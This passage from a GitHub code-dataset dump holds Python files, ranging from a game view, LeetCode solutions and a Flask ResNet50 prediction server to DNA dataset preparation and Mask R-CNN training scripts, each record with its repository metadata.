range(len(self.bcirselected)):\n if self.bcirselected[i]:\n self.bcirrid.append(i)\n total_points = str(int(total_points)+calc_points(self.bcirclicked))\n\n # bubble sort to reverse list\n bcir_sorted = False\n while not bcir_sorted:\n bcir_sorted = True\n for i in range(len(self.bcirrid) - 1):\n b = self.bcirrid[i]\n a = self.bcirrid[i + 1]\n if a > b:\n self.bcirrid[i] = a\n self.bcirrid[i + 1] = b\n bcir_sorted = False\n\n for i in self.bcirrid:\n del self.bcirselected[i]\n del self.bcirsprites[i]\n\n def update(self, delta_time: float):\n global x\n x += 1\n if x == 1450:\n x = -310\n\n self.timer -= delta_time\n\n self.gsq.update()\n self.ysq.update()\n self.rcir.update()\n self.bcir.update()\n\n for c in self.gsqsprites:\n c.update()\n\n for c in self.ysqsprites:\n c.update()\n\n for c in self.rcirsprites:\n c.update()\n\n for c in self.bcirsprites:\n c.update()\n\n # auto change to leaderboard after 60 sec\n if self.current_state == GAME_RUNNING and self.timer <= 0:\n self.current_state = LEADERBOARD\n\n\nif __name__ == \"__main__\":\n \"\"\"This section of code will allow you to run your View\n independently from the main.py file and its Director.\n You can ignore this whole section. Keep it at the bottom\n of your code.\n It is advised you do not modify it unless you really know\n what you are doing.\n \"\"\"\n from utils import FakeDirector\n\n window = arcade.Window(settings.WIDTH, settings.HEIGHT)\n my_view = SarahGameView()\n my_view.director = FakeDirector(close_on_next_view=True)\n window.show_view(my_view)\n arcade.run()\n","repo_name":"ICS4U-Gallo/cpt-2019-sms","sub_path":"sarah_game.py","file_name":"sarah_game.py","file_ext":"py","file_size_in_byte":28425,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"9131607624","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# Author : Bhishan Poudel; Physics Graduate Student, Ohio University\n# Date : Aug 11, 2016\n# Last update : \n#\n# Inputs : none\n#\n# Outputs : \n#\n# Info:\n# 1. This program finds the average flux of all the f606 and f814\n# fitsfiles inside \"color\" folder. \n#\n#\n#\n# Imports\nfrom astropy.io import fits\nfrom astropy.io.fits import getheader\nfrom astropy.io.fits import getval\nfrom astropy.io.fits import getdata\n\nsum_flux1 = 0.0\nsum_flux2 = 0.0\nfor i in range(100):\n infile1 = 'colors/f606w_gal'+str(i)+'.fits'\n infile2 = 'colors/f814w_gal'+str(i)+'.fits'\n \n flux1 = getval(infile1, 'FLUX')\n flux2 = getval(infile2, 'FLUX')\n \n sum_flux1 += flux1\n sum_flux2 += flux2\n \n \n \n# print info\navg_flux_606 = sum_flux1/100.0 \navg_flux_814 = sum_flux2/100.0 \n \nprint('{} {:.3f} {}'.format('avg_flux_606 = ',avg_flux_606, '')) # 62.395\nprint('{} {:.3f} {}'.format('avg_flux_814 = ',avg_flux_814, '')) # 72.279\n\n\n","repo_name":"bpRsh/a3a_psf_phosim_dev","sub_path":"old_psf_creation/Development/weighted_average/average_flux.py","file_name":"average_flux.py","file_ext":"py","file_size_in_byte":999,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"24210892209","text":"from django.urls import path\n\nfrom .views import (ActivityViewById, AllSubmissions, Registration,\n SubmissionView, ViewActivity)\n\nurlpatterns = [\n path('activities/', ViewActivity.as_view()),\n path('activities//', ActivityViewById.as_view()),\n path('activities//submissions/', Registration.as_view()),\n path('submissions//', SubmissionView.as_view()),\n path('submissions/', AllSubmissions.as_view()),\n\n]\n","repo_name":"Eduardo-Godoi/Kanvas","sub_path":"activities/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70716233513","text":"# BMI calculation\n# weight (kg) / (height (m) * 2)\n# convert height from cm to m by /100\n# BMI = weight / (height/100)**2\n\n\nuser_height = 190\nuser_weight = 80\n\nBMI = user_weight/(user_height/100)**2\n\nprint(f\"BMI is {BMI}\")\n\n\n\n","repo_name":"AlexAnderson220994/tech254_python","sub_path":"tasks/BMI_calculator.py","file_name":"BMI_calculator.py","file_ext":"py","file_size_in_byte":226,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28483712414","text":"# https://leetcode.com/problems/most-stones-removed-with-same-row-or-column/\n\nclass Solution:\n def removeStones(self, stones: List[List[int]]) -> int:\n group = [-1 for _ in stones]\n \n def find(node):\n if group[node] < 0:\n return node\n group[node] = find(group[node])\n return group[node]\n \n def union(node1, node2):\n parent1, parent2 = find(node1), find(node2)\n \n if group[parent1] > group[parent2]:\n parent1, parent2 = parent2, parent1\n \n if parent1 != parent2:\n group[parent1] += group[parent2]\n group[parent2] = parent1\n \n rows = defaultdict(list)\n cols = defaultdict(list)\n \n for idx, (row, col) in enumerate(stones):\n rows[row].append(idx)\n cols[col].append(idx)\n \n for row in rows.values():\n for i in range(len(row) - 1):\n union(row[i], row[i + 1])\n \n for col in cols.values():\n for i in range(len(col) - 1):\n union(col[i], col[i + 1])\n \n removed = 0\n for member in group:\n if member < 0:\n removed += abs(member) - 1\n \n return removed\n \n","repo_name":"nawrazi/competitive-programming","sub_path":"week_45/most-stones-removed-with-same-row-or-col.py","file_name":"most-stones-removed-with-same-row-or-col.py","file_ext":"py","file_size_in_byte":1369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12241796483","text":"#!/usr/local/bin/python3\nfrom flask import Flask, request, jsonify, make_response\n\nfrom io import BytesIO\nfrom PIL import Image as PILImage\n\nfrom tensorflow.keras.applications.resnet50 import ResNet50\nfrom tensorflow.keras.preprocessing import image as TFImage\nfrom tensorflow.keras.applications.resnet50 import preprocess_input, decode_predictions\nimport tensorflow as tf\nimport numpy as np\nimport os\nimport base64\n\nimport multiprocessing\n\ndef number_of_workers():\n return (multiprocessing.cpu_count() * 2) + 1\n\napp = Flask(__name__)\napp.config['JSON_AS_ASCII'] = False\n\nimport json\nwith open('resources/imagenet_class_index.json','r',encoding=\"utf-8\") as f:\n _data = json.load(f)\n class_names_to_ja_from_en = dict(zip(list(row['en'] for row in _data),list(row['ja'] for row in _data)))\n\ngraph = tf.get_default_graph()\nmodel = ResNet50(weights='imagenet')\n\ndef _input(binary_image):\n if binary_image is None:\n return ''\n\n _img = PILImage.open(BytesIO(binary_image))\n\n _resize_img = _img.resize((224,224))\n x = TFImage.img_to_array(_resize_img)\n x = np.expand_dims(x, axis=0)\n x = preprocess_input(x)\n return x\n\n@app.route('/predict', methods=['POST'])\ndef predict():\n img_file = request.files['img_file']\n img_file.stream.seek(0)\n img_binary = img_file.stream.read()\n with graph.as_default():\n preds = model.predict(_input(img_binary))\n\n return make_response(jsonify({\n 'image':base64.b64encode(img_binary).decode(\"utf-8\"),\n 'label':class_names_to_ja_from_en[decode_predictions(preds, top=1)[0][0][1]]\n }))\n\n@app.route('/health', methods=['GET'])\ndef health():\n return make_response(jsonify({\n 'health': 'OK'\n }))\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=3001)\n\n","repo_name":"oyenakaw/zukan","sub_path":"backend/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1796,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"36299206137","text":"import math\nimport os\nimport numpy as np\nfrom dnautils import rev_comp\nimport random\nimport dnautils\nfrom seqsample import SeqSample\nfrom itertools import groupby\n__author__ = 'pazbu'\n\"\"\"\nInput:\n path_in_positive: '.seq' file with \"positive\" dna sequences and their location\n path_in_negative: '.seq' file with \"negative\" dna sequences and their location\n path_out_X: target path for the samples\n path_out_y: target path for the labels\n target_length: a common length for all samples in the output. The sub-sequence will be taken from the middle.\n\nOutput:\n A dataset to be used for training or testing a machine learning model\n\"\"\"\n\n# Input params:\npath_in_positive = '/cs/grad/pazbu/paz/dev/projects/data/ENCODE_hg19/combined.fa'\npath_in_negative = '/cs/grad/pazbu/paz/dev/projects/data/ENCODE_mm10/dataset/negative_shuffled.fasta'\nlabels_path = '/cs/grad/pazbu/paz/dev/projects/data/ENCODE_hg19/combined.labels.tsv'\npath_out = '/cs/grad/pazbu/paz/dev/projects/data/ENCODE_hg19/datasets/liver.thyroid'\ntarget_length = 1000\n\n\ndef fastaread(fasta_name):\n f = open(fasta_name)\n faiter = (x[1] for x in groupby(f, lambda line: line.startswith(\">\")))\n for header in faiter:\n header = next(header)[1:].strip()\n seq = \"\".join(s.strip() for s in next(faiter))\n yield header, seq\n\n\ndef center_header(header, start_offset, length):\n chrom, location = header.split(':')\n added_info = ''\n if '|' in location:\n location, added_info = location.split('|', 1)\n added_info = '|' + added_info\n start, _ = location.split('-')\n start = int(start) + start_offset\n end = int(start) + length\n location = str(start) + '-' + str(end)\n return chrom + ':' + location + added_info\n\n\ndef middle_subseqs(path_in):\n \"\"\"\n :param path_in:\n :return: the middle target_length letters from the sequences in the input file\n \"\"\"\n faiter = fastaread(path_in)\n for header, seq in faiter:\n l = len(seq)\n seq = seq.upper()\n if l < target_length:\n pass\n #sys.stderr.write('target sequence length is longer than a sequence in the file.\\n')\n # exit(1)\n else:\n start_idx = math.floor((l - target_length) // 2)\n header = center_header(header, start_idx, target_length)\n yield header, seq[start_idx:start_idx + target_length]\n\n\ndef all_subseqs(path_in):\n \"\"\"\n :param path_in:\n :return: all disjoint segments of length target_length from the sequences in the input file\n \"\"\"\n faiter = fastaread(path_in)\n for header, seq in faiter:\n l = len(seq)\n seq = seq.upper()\n if l < target_length:\n pass\n #sys.stderr.write('target sequence length is longer than a sequence in the file.\\n')\n # exit(1)\n else:\n for start_idx in range(0, l, target_length):\n if start_idx + target_length <= l:\n header = center_header(header, start_idx, target_length)\n yield header, seq[start_idx:start_idx + target_length]\n\n\ndef dna_to_one_hot(seq):\n \"\"\"converts a DNA sequence of length N to its one-hot 4xN representation\"\"\"\n seq = seq.upper()\n num2letter = {0: 'A', 1: 'C', 2: 'G', 3: 'T'}\n letter2num = dict((v, k) for k, v in num2letter.items())\n letter2num['N'] = 0\n num_bases = len(seq)\n letters = list(seq)\n idxs = list(map(lambda l: letter2num[l], letters))\n one_hot = np.zeros((4, num_bases), dtype=np.uint8)\n one_hot[idxs, np.arange(num_bases)] = 1\n return one_hot\n\n\ndef augment(seq):\n shift = 0\n pad_char = 'A'\n while shift == 0:\n shift = random.randint(-50, 50)\n if shift < 0:\n aug_seq = abs(shift) * pad_char + seq[:len(seq) - abs(shift)]\n else:\n aug_seq = seq[shift:] + abs(shift) * pad_char\n return aug_seq\n\n\nimport pandas as pd\ndf = pd.read_csv(labels_path, sep='\\t', header=None)\ndf = df[df.columns[3:]]\nlabel_mat = df.as_matrix()\nlabel_mat = label_mat.astype(int)\n\n\nprint('converting positives...')\nsamples = []\nheaders = []\nlabels = []\nc = 0\nd = dict()\nfor header, seq in middle_subseqs(path_in_positive):\n samples.append(dna_to_one_hot(seq))\n headers.append(header)\n labels.append(label_mat[c])\n\n rev_comp_seq = rev_comp(seq)\n samples.append(dna_to_one_hot(rev_comp_seq))\n headers.append(header + ' - revcomp')\n labels.append(label_mat[c])\n\n # aug_seq = augment(seq)\n # samples.append(dna_to_one_hot(aug_seq))\n # headers.append(header + ' - augmented')\n # labels.append(label_mat[c])\n #\n # rev_comp_aug_seq = rev_comp(aug_seq)\n # samples.append(dna_to_one_hot(rev_comp_aug_seq))\n # headers.append(header + ' - revcomp+augmented')\n # labels.append(label_mat[c])\n\n if c % 1000 == 0:\n print(c)\n c += 1\n\n\nprint('number of positives (incl. rev-comps): ', len(samples))\n\n# print('converting negatives...')\n# c = 0\n\n# neg_samples = []\n# for header, seq in all_subseqs(path_in_negative):\n# for header, seq in middle_subseqs(path_in_negative):\n# samples.append(dna_to_one_hot(seq))\n# headers.append(header)\n# labels.append(np.zeros(27))\n#\n# rev_comp_seq = rev_comp(seq)\n# samples.append(dna_to_one_hot(rev_comp_seq))\n# headers.append(header + ' - revcomp')\n# labels.append(np.zeros(27))\n#\n# aug_seq = augment(seq)\n# samples.append(dna_to_one_hot(aug_seq))\n# headers.append(header + ' - augmented')\n# labels.append(np.zeros(27))\n#\n# rev_comp_aug_seq = rev_comp(aug_seq)\n# samples.append(dna_to_one_hot(rev_comp_aug_seq))\n# headers.append(header + ' - revcomp+augmented')\n# labels.append(np.zeros(27))\n# c += 1\n# if c % 1000 == 0:\n# print(c)\n#\n# if c > 30000:\n# break\n\n# print('number of negatives: ', len(neg_samples))\n#\n# ##################### MULTI-CLASS #########################\n#\n# # samples.extend(neg_samples)\nsamples_stacked = np.stack(samples)\nlabels = np.array(labels)\nheaders = np.array(headers)\n###########################################################\n\n\n# pos_labels = np.ones((len(samples), 1), dtype=bool)\n# neg_labels = np.zeros((len(neg_samples), 1), dtype=bool)\n# labels = np.vstack((pos_labels, neg_labels))\n# samples.extend(neg_samples)\n# samples_stacked = np.stack(samples)\n# headers = np.array(headers)\n\n# shuffle\nidxs = np.arange(len(samples_stacked))\nperm = np.random.permutation(idxs)\nlabels = labels[perm]\nsamples_stacked = samples_stacked[perm]\nheaders = headers[perm]\n\n# divide\n# train_index, validation_index, test_index = np.split(perm, [int(.8*len(perm)), int(0.85*len(perm))])\n\ntrain_index = []\nvalidation_index = []\ntest_index = []\n\nfor i, header in enumerate(headers):\n if 'chr6' in header or 'chr7' in header:\n validation_index.append(i)\n elif 'chr8' in header or 'chr9' in header:\n test_index.append(i)\n else:\n train_index.append(i)\n\n# # compress\n#\n# # for (idxs, name) in zip((train_index, validation_index, test_index), ('train', 'validation', 'test')):\n# # Xr = np.reshape(samples_stacked[idxs], 4*1000*len(idxs))\n# # Xb = np.packbits(Xr)\n# # np.save('X_bin_' + name, Xb)\n# #\n# # Yr = np.reshape(labels[idxs], 27*len(idxs))\n# # Yb = np.packbits(Yr)\n# # np.save('Y_bin_' + name, Yb)\n# #\n# # np.save('headers_' + name, headers[idxs])\n#\nfor (idxs, name) in zip((train_index, validation_index, test_index), ('train', 'validation', 'test')):\n np.save(os.path.join(path_out, 'X_' + name), samples_stacked[idxs])\n np.save(os.path.join(path_out, 'Y_' + name), labels[idxs])\n np.save(os.path.join(path_out, 'headers_' + name), headers[idxs])\n\nprint('after save')\n#\n# # np.save(path_out, samples)\n# np.save(os.path.join(path_out, 'X_windows'), samples_stacked)\n","repo_name":"pazbunis/seq2dataset","sub_path":"seq2simple_classification.py","file_name":"seq2simple_classification.py","file_ext":"py","file_size_in_byte":7754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"817016779","text":"# Given two strings s and t, return true if s is a subsequence of t, or false otherwise.\n#\n# A subsequence of a string is a new string that is formed from the original string by deleting\n# some (can be none) of the characters without disturbing the relative\n# positions of the remaining characters. (i.e., \"ace\" is a subsequence of \"abcde\" while \"aec\" is not).\n# idea Two pointers traverse each string then deleting (replacing the not in the orignal str) then Find if it there's or not\nclass Solution:\n def isSubsequence(self, s: str, t: str) -> bool:\n i = 0\n j = 0\n if len(s) == 0:\n return True\n while i < len(t) and j < len(s):\n\n if t[i] == s[j]:\n i = i + 1\n j = j + 1\n else:\n t = t.replace(t[i], '', 1)\n if t.find(s) == -1:\n return False\n else:\n return True\n\n\ns = Solution()\nbool = s.isSubsequence('ahmad', 'achmkakuddpppo') # true\n\nprint(bool)\n","repo_name":"ahmaddroobi99/ProblemSolving","sub_path":"IsSubsequent.py","file_name":"IsSubsequent.py","file_ext":"py","file_size_in_byte":995,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"4939323417","text":"\"\"\"\nImport x-ray image data using the dxtbx machinery\n\"\"\"\n\n#<--- LEFT OFF HERE --->\n\nimport argparse\n\nimport numpy as np\n\nfrom mdx2.data import ImageSeries\nfrom mdx2.dxtbx_machinery import ImageSet\nfrom mdx2.utils import saveobj\n\ndef parse_arguments():\n \"\"\"Parse commandline arguments\"\"\"\n\n parser = argparse.ArgumentParser(\n description=__doc__,\n formatter_class=argparse.ArgumentDefaultsHelpFormatter,\n )\n\n # Required arguments\n parser.add_argument(\"expt\", help=\"experiments file, such as from dials.import\")\n parser.add_argument(\"--outfile\", default=\"data.nxs\", help=\"name of the output NeXus file\")\n parser.add_argument(\"--chunks\", nargs=3, type=int, metavar='N', help=\"chunking for compression (frames, y, x)\")\n\n return parser\n\ndef run(args=None):\n parser = parse_arguments()\n args = parser.parse_args(args)\n\n exptfile = args.expt\n\n image_series = ImageSeries.from_expt(exptfile)\n iset = ImageSet.from_file(exptfile)\n\n if args.chunks is not None:\n image_series.data.chunks=tuple(args.chunks)\n\n nxs = saveobj(image_series,args.outfile,name='image_series')\n\n iset.read_all(image_series.data,image_series.data.chunks[0])\n\n print(\"done!\")\n\nif __name__ == \"__main__\":\n run()\n","repo_name":"ando-lab/mdx2","sub_path":"mdx2/command_line/import_data.py","file_name":"import_data.py","file_ext":"py","file_size_in_byte":1249,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"14136990252","text":"import numpy as np\r\nfrom posetwister.utils import load_json\r\n\r\nkeypoints_names = [\"nose\", \"left_eye\", \"right_eye\", \"left_ear\", \"right_ear\", \"left_shoulder\",\r\n \"right_shoulder\", \"left_elbow\", \"right_elbow\", \"left_wrist\", \"right_wrist\",\r\n \"left_hip\", \"right_hip\", \"left_knee\", \"right_knee\", \"left_ankle\", \"right_ankle\"]\r\nkeypoints_ids = {n: i for i, n in enumerate(keypoints_names)}\r\n\r\n\r\ndef angle(vect1, vect2):\r\n return np.degrees(np.arccos(np.dot(vect1, vect2) / (\r\n np.linalg.norm(vect1) * np.linalg.norm(vect2))))\r\n\r\n\r\ndef get_angles(reference_keypoints):\r\n point_lsh = reference_keypoints[keypoints_ids['left_shoulder']][:2]\r\n point_rsh = reference_keypoints[keypoints_ids['right_shoulder']][:2]\r\n point_lhip = reference_keypoints[keypoints_ids['left_hip']][:2]\r\n point_rhip = reference_keypoints[keypoints_ids['right_hip']][:2]\r\n point_lelb = reference_keypoints[keypoints_ids['left_elbow']][:2]\r\n point_relb = reference_keypoints[keypoints_ids['right_elbow']][:2]\r\n point_lwr = reference_keypoints[keypoints_ids['left_wrist']][:2]\r\n point_rwr = reference_keypoints[keypoints_ids['right_wrist']][:2]\r\n point_lkn = reference_keypoints[keypoints_ids['left_knee']][:2]\r\n point_rkn = reference_keypoints[keypoints_ids['right_knee']][:2]\r\n point_lank = reference_keypoints[keypoints_ids['left_ankle']][:2]\r\n point_rank = reference_keypoints[keypoints_ids['right_ankle']][:2]\r\n\r\n torso = np.mean([point_lsh, point_rsh], axis=0)\r\n hips = np.mean([point_lhip, point_rhip], axis=0)\r\n vect_body = [n - m for (n, m) in zip(torso, hips)]\r\n\r\n vect_left_arm = [n - m for (n, m) in zip(point_lelb, point_lsh)]\r\n vect_left_wrist = [n - m for (n, m) in zip(point_lwr, point_lelb)]\r\n vect_left_knee = [n - m for (n, m) in zip(point_lkn, point_lhip)]\r\n vect_left_ankle = [n - m for (n, m) in zip(point_lank, point_lkn)]\r\n\r\n vect_right_arm = [n - m for (n, m) in zip(point_relb, point_rsh)]\r\n vect_right_wrist = [n - m for (n, m) in zip(point_rwr, point_relb)]\r\n vect_right_knee = [n - m for (n, m) in zip(point_rkn, point_rhip)]\r\n vect_right_ankle = [n - m for (n, m) in zip(point_rank, point_rkn)]\r\n\r\n angle_lsh = angle(vect_left_arm, vect_body)\r\n angle_lelb = angle(vect_left_wrist, vect_left_arm)\r\n angle_lhip = angle(vect_left_knee, vect_body)\r\n angle_lkne = angle(vect_left_ankle, vect_left_knee)\r\n angle_rsh = angle(vect_right_arm, vect_body)\r\n angle_relb = angle(vect_right_wrist, vect_right_arm)\r\n angle_rhip = angle(vect_right_knee, vect_body)\r\n angle_rkne = angle(vect_right_ankle, vect_right_knee)\r\n angles = [angle_lsh, angle_rsh, angle_lelb, angle_relb, angle_lhip, angle_rhip, angle_lkne, angle_rkne]\r\n return angles\r\n\r\n\r\ndef compute_similarity(keypoints, reference_keypoints):\r\n ref_angles = get_angles(reference_keypoints)\r\n cand_angles = get_angles(keypoints)\r\n return np.sum(np.abs([n - m for (n, m) in zip(ref_angles, cand_angles)]))\r\n\r\n\r\nref_pose0 = load_json(\"/home/strakajk/MLProjects/PoseTwister/data/ref_poses/t_pose-0.json\")\r\nref_pose1 = load_json(\"/home/strakajk/MLProjects/PoseTwister/data/ref_poses/t_pose-1.json\")\r\nref_pose2 = load_json(\"/home/strakajk/MLProjects/PoseTwister/data/ref_poses/t_pose-2.json\")\r\nkeypoints0 = ref_pose0[\"keypoints\"][0]\r\nkeypoints1 = ref_pose1[\"keypoints\"][0]\r\nkeypoints2 = ref_pose2[\"keypoints\"][0]\r\n\r\nsimilarity = compute_similarity(keypoints0, keypoints1)\r\nprint(similarity)\r\n\r\nsimilarity = compute_similarity(keypoints0, keypoints2)\r\nprint(similarity)\r\n\r\nsimilarity = compute_similarity(keypoints1, keypoints2)\r\nprint(similarity)\r\n","repo_name":"strakaj/PoseTwister","sub_path":"pose_predictions.py","file_name":"pose_predictions.py","file_ext":"py","file_size_in_byte":3635,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14450563547","text":"from controller.token import (\n Token,\n TokenType\n)\n\nfrom model.Operation import Operation\nfrom model.Configuration import Configuration\n\noperationList = []\nconfigurationSettings: Configuration = Configuration()\n\ndef start_evaluate(tokens_input = [], prevOperation = None) -> Operation:\n \n index: int = 0\n tokens = tokens_input\n\n currentOperation = Operation(fatherOperation=prevOperation)\n \n while len(tokens):\n token: Token = tokens.pop(0)\n \n if token.getType() == TokenType.RBRACE:\n if currentOperation.fatherOperation is None:\n operationList.append(currentOperation)\n return start_evaluate(tokens, None)\n \n if token.getType() == TokenType.RBRACKET:\n \n if currentOperation.operation is None:\n while len(tokens):\n token: Token = tokens.pop(0)\n if token.getType() == TokenType.LETTER and token.getLiteral() =='\"texto\"':\n title: str = tokens[1].getLiteral()\n title: str = title.replace('\"', '')\n configurationSettings.title = title\n\n if token.getType() == TokenType.LETTER and token.getLiteral() =='\"fondo\"':\n backgroundColor: str = tokens[1].getLiteral()\n backgroundColor: str = backgroundColor.replace('\"', '')\n configurationSettings.backgroundColor = backgroundColor\n\n if token.getType() == TokenType.LETTER and token.getLiteral() =='\"fuente\"':\n fontStyle: str = tokens[1].getLiteral()\n fontStyle: str = fontStyle.replace('\"', '')\n configurationSettings.fontStyle = fontStyle\n\n if token.getType() == TokenType.LETTER and token.getLiteral() =='\"forma\"':\n style: str = tokens[1].getLiteral()\n style: str = style.replace('\"', '')\n configurationSettings.style = style\n pass\n \n return currentOperation\n \n if token.getType() == TokenType.LETTER and token.getLiteral() =='\"operacion\"':\n res: str = tokens[1].getLiteral()\n res: str = res.replace('\"', '')\n currentOperation.operation = res\n \n if token.getType() == TokenType.LETTER and token.getLiteral() == '\"valor1\"':\n valueToken: Token = tokens[1]\n \n if valueToken.getType() == TokenType.NUMBER:\n currentOperation.value1 = float(valueToken.getLiteral())\n else:\n currentOperation.value1 = start_evaluate(tokens, currentOperation)\n \n if token.getType() == TokenType.LETTER and token.getLiteral() == '\"valor2\"':\n valueToken: Token = tokens[1]\n \n if valueToken.getType() == TokenType.NUMBER:\n currentOperation.value2 = float(valueToken.getLiteral())\n else:\n currentOperation.value2 = start_evaluate(tokens, currentOperation)\n \n index += 1\n \n return currentOperation","repo_name":"Fernando-Ibarra/LFP_S2_2023_Proyecto1_202110531","sub_path":"controller/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":3192,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"9181910805","text":"import os\nimport sys\nimport matplotlib.pyplot as plt\n\nsys.path.insert(0, '../libraries')\nfrom mrcnn.config import Config\nimport mrcnn.utils as utils\nimport mrcnn.model as modellib\nfrom mrcnn.model import log\nimport mcoco.coco as coco\n\n\n# HOME_DIR is the path that the project you put on\nHOME_DIR = '.../current-lane-drivable-master'\nDATA_DIR = os.path.join(HOME_DIR, \"data/drivable\")\nprint(DATA_DIR)\nWEIGHTS_DIR = os.path.join(HOME_DIR, \"data/weights\")\nprint(WEIGHTS_DIR)\nMODEL_DIR = os.path.join(DATA_DIR, \"logs\")\nprint(MODEL_DIR)\n\n# Local path to trained weights file\nDRIVABLE_MODEL_PATH = os.path.join(WEIGHTS_DIR, \"mask_rcnn_drivable_res50.h5\")\n# Download COCO trained weights from Releases if needed\n# if not os.path.exists(COCO_MODEL_PATH):\n# utils.download_trained_weights(COCO_MODEL_PATH)\n\n\ndef get_ax(rows=1, cols=1, size=8):\n \"\"\"Return a Matplotlib Axes array to be used in\n all visualizations in the notebook. Provide a\n central point to control graph sizes.\n\n Change the default size attribute to control the size\n of rendered images\n \"\"\"\n _, ax = plt.subplots(rows, cols, figsize=(size * cols, size * rows))\n return ax\n\ndataset_train = coco.CocoDataset()\ndataset_train.load_coco(DATA_DIR, subset=\"drivable_train\", year=\"2019\")\ndataset_train.prepare()\n\ndataset_validate = coco.CocoDataset()\ndataset_validate.load_coco(DATA_DIR, subset=\"drivable_validate\", year=\"2019\")\ndataset_validate.prepare()\n\ndataset_test = coco.CocoDataset()\ndataset_test.load_coco(DATA_DIR, subset=\"drivable_test\", year=\"2019\")\ndataset_test.prepare()\n\n\n# change from coco config\nclass ShapesConfig(Config):\n \"\"\"Configuration for training on the shapes dataset.\n \"\"\"\n NAME = \"drivable\"\n\n #choose backbone\n BACKBONE = \"resnet50\"\n\n # Train on 1 GPU and 2 images per GPU. Put multiple images on each\n # GPU if the images are small. Batch size is 2 (GPUs * images/GPU).\n GPU_COUNT = 1\n IMAGES_PER_GPU = 1\n\n # Number of classes (including background)\n NUM_CLASSES = 1 + 1 # background + 1(drivable)\n\n # # Use smaller images for faster training.\n IMAGE_MAX_DIM = 1024\n IMAGE_MIN_DIM = 512\n IMAGE_RESIZE_MODE = \"square\"\n\n # # Use smaller anchors because our image and objects are small\n # RPN_ANCHOR_SCALES = rpn_anchor_scales\n\n # # Aim to allow ROI sampling to pick 33% positive ROIs.\n TRAIN_ROIS_PER_IMAGE = 128\n\n STEPS_PER_EPOCH = 1000\n\n VALIDATION_STEPS = 50\n POST_NMS_ROIS_INFERENCE = 512\n\n # Loss weights for more precise optimization.\n # Can be used for R-CNN training setup.\n LOSS_WEIGHTS = {\n \"rpn_class_loss\": 1.,\n \"rpn_bbox_loss\": 1.,\n \"mrcnn_class_loss\": 1.,\n \"mrcnn_bbox_loss\": 1.,\n \"mrcnn_mask_loss\": 1.\n }\n\nconfig = ShapesConfig()\nconfig.display()\n\nmodel = modellib.MaskRCNN(mode=\"training\", config=config, model_dir=MODEL_DIR)\n\n# inititalize_weights_with = \"coco\" # imagenet, coco, or last\n# if inititalize_weights_with == \"imagenet\":\n# model.load_weights(model.get_imagenet_weights(), by_name=True)\n#\n# elif inititalize_weights_with == \"coco\":\n# model.load_weights(COCO_MODEL_PATH, by_name=True,\n# exclude=[\"mrcnn_class_logits\", \"mrcnn_bbox_fc\",\n# \"mrcnn_bbox\", \"mrcnn_mask\"])\n#\n# elif inititalize_weights_with == \"last\":\n# Load the last model you trained and continue training\n# model.load_weights(model.find_last()[1], by_name=True)\n\nmodel.load_weights(DRIVABLE_MODEL_PATH, by_name=True,\n exclude=[\"mrcnn_class_logits\", \"mrcnn_bbox_fc\",\n \"mrcnn_bbox\", \"mrcnn_mask\"])\n\nmodel.train(dataset_train, dataset_validate,\n learning_rate=config.LEARNING_RATE,\n epochs=4,\n layers='heads')\nmodel.train(dataset_train, dataset_validate,\n learning_rate=config.LEARNING_RATE,\n epochs=12,\n layers='4+')\n\nmodel.train(dataset_train, dataset_validate,\n learning_rate=config.LEARNING_RATE / 10,\n epochs=16, # starts from the previous epoch, so only 1 additional is trained\n layers=\"all\")\n\n######################################\n# Add augmentation #\n######################################\n# # Training - Stage 1\n# print(\"Training network heads\")\n# model.train(dataset_train, dataset_val,\n# learning_rate=config.LEARNING_RATE,\n# epochs=40,\n# layers='heads',\n# augmentation=augmentation)\n#\n# # Training - Stage 2\n# # Finetune layers from ResNet stage 4 and up\n# print(\"Fine tune Resnet stage 4 and up\")\n# model.train(dataset_train, dataset_val,\n# learning_rate=config.LEARNING_RATE,\n# epochs=120,\n# layers='4+',\n# augmentation=augmentation)\n#\n# # Training - Stage 3\n# # Fine tune all layers\n# print(\"Fine tune all layers\")\n# model.train(dataset_train, dataset_val,\n# learning_rate=config.LEARNING_RATE / 10,\n# epochs=160,\n# layers='all',\n# augmentation=augmentation)","repo_name":"pandamax/current-lane-drivable","sub_path":"mask-rcnn/notebooks/mask_rcnn_drivable.py","file_name":"mask_rcnn_drivable.py","file_ext":"py","file_size_in_byte":5076,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"37818687606","text":"'''\nAlgorithm of Insertion Sort:\n\nInsertion sort iterates, consuming one input element each repetition, and growing a sorted output list.\nAt each iteration, insertion sort removes one element from the input data, finds the location it belongs within the sorted list, and inserts it there.\nIt repeats until no input elements remain.\n\n'''\n\n\nclass Solution:\n def insertionSortList(self, head: ListNode) -> ListNode:\n j = []\n \n k = head\n \n \n while k:\n j.append(k.val)\n k = k.next\n \n j.sort()\n\n \n head = ListNode(0)\n ptr = head\n \n \n for i in j:\n newNode = ListNode(i)\n ptr.next = newNode\n ptr = ptr.next\n \n return head.next\n","repo_name":"yashagrawal300/python-programs","sub_path":"Leetcode/November challenge/Insertion Sort List.py","file_name":"Insertion Sort 